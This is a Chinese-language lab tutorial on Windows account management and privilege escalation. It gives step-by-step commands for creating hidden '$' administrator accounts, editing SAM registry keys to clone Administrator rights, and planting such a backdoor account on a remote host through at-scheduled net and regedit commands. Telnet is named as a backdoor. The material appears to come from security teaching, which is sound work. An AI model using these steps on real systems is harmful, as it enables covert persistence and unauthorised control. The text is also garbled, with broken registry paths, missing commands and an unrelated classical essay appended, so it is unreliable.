賬戶管理與權限提升

1、賬戶管理與權限提升【實驗原理】系統(tǒng)賬戶管理是系統(tǒng)安全的重要組成部分，攻擊者多通過獲取或創(chuàng)建賬戶并提升權限來獲取對系統(tǒng)的控制權。net user 命令用于添加或更改用戶賬號或顯示用戶賬號信息；可通過 net localgroup administration用戶名 /add 為用戶提升權限；net share 命令用于創(chuàng)建或刪除或顯示系統(tǒng)共享資源；net start 命令用于啟動服務或顯示已啟動服務的列表；Telnet 服務為 Windows 系統(tǒng)自帶服務。 用于遠程用戶連接本地系統(tǒng)的命令行；可用作后門連接使用；默認開放端口為23?！緦嶒灜h(huán)境】本地主機 (WindowsXP) 、 Windows

2、 實驗臺實驗的網(wǎng)絡拓撲如下圖所示，實驗目標需首先確定所在主機實驗臺驟填寫正確的IP 地址進行實驗。IP地址，并根據(jù)實驗步本地主機Windows實驗臺圖【實驗步驟】一、 本地管理賬戶：本地管理賬戶主要通過三種方式進行用戶賬戶查看管理(1) 通過命令行格式直接進行查看在命令行直接輸入 net user，即可對系統(tǒng)的基本賬戶進行查看，但是此種方法無法查看用戶名為“用戶名 $”形式的用戶。(2) 通過管理工具圖形界面進行查看打開管理工具中計算機管理， 進入本地用戶和組， 點擊用戶便可對系統(tǒng)賬戶進行查看， 包括系統(tǒng)賬戶的用戶名權限等信息的查看及修改。(3) 通過查看注冊表信息主用戶賬戶信息進行查看在運行

3、中輸入 regedit，進入注冊表后打開 HKEY_LOCAL_MACHINEsamsam ，右鍵點擊 SAM ，選擇權限，為 Administrator 用戶添加權限。圖圖關 閉 注 冊 表 ， 再 次 在 運 行 中 輸 入 regedit ， 進 入 注 冊 表 后 打 開HKEY_LOCAL_MACHINEsamsamDomainsaccountusers,user 下面的 Names 中各個鍵的鍵值與上面的信息是一致的圖此種查看方式能夠對全部的系統(tǒng)賬戶進行查看， 但是不易對賬戶信息修改， 因為各個賬戶信息均有系統(tǒng)生成十六位進制信息。二、 本地建立隱藏賬戶：(1) 建立賬戶點擊“開始”

4、“運行” ，輸入“ CMD ”運行“命令提示符” ，輸入“ net user abc$ 123 /add” 回車，成功后會顯示“命令成功完成” 。接著輸入“ net localgroup administrators abc$ /add ”回車，這樣就利用“命令提示符”成功地建立了一個用戶名為“ abc$”，密碼為“ 123”的簡單“隱藏賬戶” ,并且把該隱藏賬戶提升為管理員權限。查看隱藏賬戶的建立是否成功。在“命令提示符”中輸入查看系統(tǒng)賬戶的命令“ net user”，回車后會顯示當前系統(tǒng)中存在的賬戶。從返回的結果中可以看到剛才建立的 “ abc$”這個賬戶并不存在。接著讓進入控制面板的“管

5、理工具” ，打開其中的“計算機” ，查看其中的“本地用戶和組” ，在“用戶”一項中，剛建立的隱藏賬戶“abc$”便可以查看到。圖總結得出的結論是：這種方法只能將賬戶在“命令提示符”中進行隱藏，在“計算機管理”中對此種賬戶查看顯而易見。(2) 在“注冊表”中進行賬戶隱藏以上可以看到用命令提示符隱藏賬戶的方法缺點很明顯，很容易暴露。 那么有沒有可以在 “命令提示符” 和“計算機管理”中同時隱藏賬戶的技術呢？答案是肯定的，而這一切只需要我們在“注冊表”中進行一番小小的設置，就可以讓系統(tǒng)賬戶在兩者中完全不能查看。(3) 給管理員注冊表操作權限在注冊表中對系統(tǒng)賬戶的鍵值進行操作，需要到“HKEY_LOC

6、AL_MACHINESAMSAM”處進行修改， 但是當來到該處時，會發(fā)現(xiàn)無法展開該處所在的鍵值。這是因為系統(tǒng)默認對系統(tǒng)管理員給予“寫入DAC ”和“讀取控制”權限，沒有給予修改權限，因此不能對“SAM ”項下的鍵值進行查看和修改。不過可以借助系統(tǒng)中另一個“注冊表編輯器”給管理員賦予修改權限。點擊“開始”“運行”，輸入“ regedt.exe”后回車，隨后會彈出另一個“注冊表編輯器”，平時使用的 “注冊表編輯器”不同的是它可以修改系統(tǒng)賬戶操作注冊表時的權限（為便于理解，以下簡稱regedt.exe）。在 regedt.exe 中打開“ HKEY_LOCAL_MACHINESAMSAM”處，點擊“

7、安全” 菜單 “權限”，在彈出的 “ SAM 的權限” 編輯窗口中選中 “ administrators ”賬戶，在下方的權限設置處勾選“完全控制”，完成后點擊“確定”即可。然后我們切換回“注冊表編輯器” ，可以發(fā)現(xiàn)“ HKEY_LOCAL_MACHINESAMSAM ”下面的鍵值都可以展開了。(4) 將隱藏賬戶替換為管理員打 開 注 冊 表 編 輯 器 “ HKEY_LOCAL_MACHINESAMSAMDomainsAccount UsersNames”，當前系統(tǒng)中所有存在的賬戶都會在這里顯示，當然包括我們的隱藏賬戶。點擊我們的隱藏賬戶“ abc$”，在右邊顯示的鍵值中的“類型”一項顯示為

8、 0x3fa ，向上來到 “ ”處，可以找到 “ 000003fa”這一項，這兩者是相互對應的，隱藏賬戶“abc$”的所有信息都在“000003fa”這一項中。同樣的，我們可以找到“administrator ”賬戶所對應的項為“000001F4”。圖將“ abc$”的鍵值導出為 abc$.reg，同時將“ 000003Fa”和“ 000001F4”項的 F 鍵值分別導出為 user.reg， admin.reg。用“記事本”打開 admin.reg ，將其中“ F”值后面的內容復制下來，替換 user.reg 中的“ F”值內容， 完成后保存。 接下來進入 “命令提示符” ，輸入 “net

9、userabc$ /del ”將我們建立的隱藏賬戶刪除。最后，將abc$.reg 和 user.reg 導入注冊表，至此，隱藏賬戶制作完成。圖三、 遠程建立隱藏超級用戶賬戶：(1) 先與遠程主機（實驗臺）建立連接,命令為 :（實驗臺ip） " /user:administrator(2) 用 at 命令在遠程主機上建立一個用戶(如果 at 服務沒有啟動， 可用 netsvc.exe、sc.exe或 sc 命令來遠程啟動。建立這個加有 $符的用戶名，是因為加有 $符后，命令行下用 net user 將不顯示這個用戶，但在帳戶管理器卻能看到這個用戶。(3) 同樣用 at 命令導出HKEY

10、_LOCAL_MACHINEsamsamDomainsaccountusers下鍵值（先需 administrator 用戶對注冊表的訪問權限，在遠程主機的運行中輸入regedit，進入注冊表后打開HKEY_LOCAL_MACHINEsamsam，右鍵點擊SAM ，選擇權限，為Administrator用戶添加權限） ：SAMSAMDomainsaccountusers/e是 regedit 的 參 數(shù) ， 在 HKEY_LOCAL_MACHINE 這個鍵的一定要以 結尾。必要的情況下可以用引號將下面引起來："c:winntregedit.exe /e abc.reg HKEY_LO

11、CAL_MACHINESAMSAMDomainsaccount users"。(4) 將遠程主機上的 abc.reg 下載到本機上用記事本打開進行編輯命令為：修改的方法已經(jīng)介紹過了，這里就不作介紹了。(5) 再將編輯好的 abc.reg 拷回遠程主機：(6)查看遠程主機時間： net time 13.50.97.238 然后用 at 命令將用戶 abc$刪除 :at 192.168.1.235 11:56 c:windowssystem32net.exe user abc$ /del(7)驗證 abc$是否刪除 :用 net use 13.50.97.238 /del 斷開與遠程主機

12、的連接。用帳戶 abc$與遠程主機連接，不能連接說明已刪除。(8) 再與遠程主機建立連接：再取得遠程主機時間，用at 命令將拷回遠程主機的abc1.reg 導入遠程主機注冊表:regedit.exe 的參數(shù) /s 是指安靜模式。(9) 再驗證 abc$是否已建立，方法同上面驗證abc$是否被刪除一樣。(10) 再驗證用戶 abc$是否有讀、寫、刪的權限，(11) 通過 10 可以斷定用戶abc$具有超級用戶權限，因為最初用at 命令建立它的時候是一個普通用戶，而現(xiàn)在卻具有遠程讀、寫、刪的權限。出師表兩漢：諸葛亮先帝創(chuàng)業(yè)未半而中道崩殂， 今天下三分， 益州疲弊， 此誠危急存亡之秋也。然侍衛(wèi)之臣不

13、懈于內，忠志之士忘身于外者，蓋追先帝之殊遇，欲報之于陛下也。誠宜開張圣聽，以光先帝遺德，恢弘志士之氣，不宜妄自菲薄，引喻失義，以塞忠諫之路也。宮中府中，俱為一體；陟罰臧否，不宜異同。若有作奸犯科及為忠善者，宜付有司論其刑賞，以昭陛下平明之理；不宜偏私，使內外異法也。侍中、侍郎郭攸之、費祎、董允等，此皆良實，志慮忠純，是以先帝簡拔以遺陛下：愚以為宮中之事，事無大小，悉以咨之，然后施行，必能裨補闕漏，有所廣益。將軍向寵，性行淑均，曉暢軍事，試用于昔日，先帝稱之曰愚以為營中之事，悉以咨之，必能使行陣和睦，優(yōu)劣得所?！澳?”，是以眾議舉寵為督：親賢臣， 遠小人， 此先漢所以興隆也； 親小人， 遠賢臣， 此后漢所以傾頹也。 先帝在時，每與臣論此事， 未嘗不嘆息痛恨于桓、 靈也。 侍中、尚書、 長史、 參軍，此悉貞良死節(jié)之臣，愿陛下親之、信之，則漢室之隆，可計日而待也。臣本布衣，躬耕于南陽，茍全性命于亂世，不求聞達于諸侯。先帝不以臣卑鄙，猥自枉屈，三顧臣于草廬之中，咨臣以當世之事，由是感激，遂許先帝以驅馳。后值傾覆，受任于敗軍之際，奉命于危難之間，爾來二十有一年矣。先帝知臣謹慎，故臨崩寄臣以大事也。受